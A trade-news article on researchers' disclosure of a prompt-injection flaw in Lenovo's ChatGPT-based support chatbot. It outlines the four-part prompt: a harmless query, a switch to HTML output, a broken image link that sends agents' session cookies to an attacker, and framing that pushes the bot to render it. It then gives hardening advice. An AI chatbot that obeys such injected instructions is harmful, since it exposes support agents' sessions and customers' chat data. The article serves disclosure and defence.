Lenovo has become the latest major brand to face scrutiny after researchers uncovered a serious security vulnerability in its AI-powered customer service chatbot.
Cybernews security experts recently tested Lena, Lenovo’s ChatGPT-driven support assistant, and the results were alarming. Their investigation revealed that the chatbot could be manipulated into exposing sensitive company information and data.
The researchers discovered a flaw that allowed them to hijack live session cookies from customer support agents. With those stolen cookies, attackers could bypass login requirements, infiltrate live chats, and even review previous conversations and stored data. Shockingly, this exploit required only a single 400-character prompt.
During the investigation, Cybernews highlighted how easily AI chatbots can be tricked:
Everyone knows chatbots hallucinate and can be tricked by prompt injections. This isn’t new.
“What’s truly surprising is that Lenovo, despite being aware of these flaws, did not protect itself from potentially malicious user manipulations and chatbot outputs.”
Contact Center Technology Insights: xeoTECH & Telnyx Partner to Boost Nordic Intelligent Comms
Breaking Down the Flaw
Although Cybernews uncovered the vulnerability, there is no indication that hackers actually accessed customer data. Once the flaw was reported, Lenovo confirmed the issue and acted swiftly to secure its systems.
So how did the researchers fool Lena? Their crafted prompt contained four critical components:
-
Innocent opener – The attack started with a normal product query, such as asking for Lenovo IdeaPad specifications.
-
Hidden format switch – Next, the prompt steered the chatbot into responding in HTML (alongside JSON and plain text), which the server is programmed to process.
-
The payload – Embedded in the HTML was a fake image link. When the link failed to load, the browser attempted to contact the attacker’s server, exposing session cookies.
-
The push – Finally, the attacker framed the image as essential to the buying decision, forcing the bot to display it.
This method mirrors broader security concerns across the AI landscape. Zenity, for example, recently reported that over 3,500 public-facing AI agents remain vulnerable to similar prompt injection tactics.
Why Businesses Should Take Note
Lenovo’s chatbot flaw serves as a strong reminder for any organization relying on AI in customer service. The issue goes beyond a single mistake; it highlights how AI systems, designed to please, can be manipulated when not properly safeguarded.
Moreover, Lenovo isn’t alone. Other high-profile brands have faced similar challenges. New York City’s “MyCity” assistant once provided misleading and even illegal advice. Air Canada was taken to court after its chatbot misinformed a customer, with the ruling forcing the airline to honor the incorrect guidance. Even DPD’s chatbot ended up generating offensive content and mocking its own company.
These incidents reveal a consistent pattern: AI chatbots are prone to errors, hallucinations, and vulnerabilities. The key question for businesses is not whether an AI system will make mistakes, but how effectively they can detect and contain them.
Contact Center Technology Insights: Johns Hopkins Health System Chooses Talkdesk to Enhance Contact Center
Strengthening Chatbot Security
While AI evolves too rapidly for a one-size-fits-all playbook, companies can follow several best practices to reduce risks:
-
Harden input and output checks: Always sanitize user queries and bot responses, and block unverified code execution. This step alone could have prevented Lena’s cookie vulnerability.
-
Verify outputs before execution: Servers should never blindly trust chatbot responses as actionable instructions.
-
Restrict session privileges: Limit chatbot access levels to reduce damage if tokens or cookies are compromised.
-
Continuously monitor systems: Spotting unusual activity early can stop a minor issue from becoming a major breach.
-
Test aggressively and regularly: Simulate prompt-injection and other AI-focused attacks to identify weaknesses before real attackers do.
Contact Center Technology Insights: Insurer Launches AI Chatbot to Enhance Customer Experience
Final Takeaway
AI chatbots like Lena promise efficiency and improved customer experiences, but they also carry significant risks if left unchecked. Lenovo’s case proves that even global brands can overlook fundamental safeguards. In today’s digital environment, where small oversights can escalate rapidly, pairing AI tools with rigorous security measures is no longer optional—it’s essential.
To join our expert panel discussions, reach out to sudipto@intentamplify.com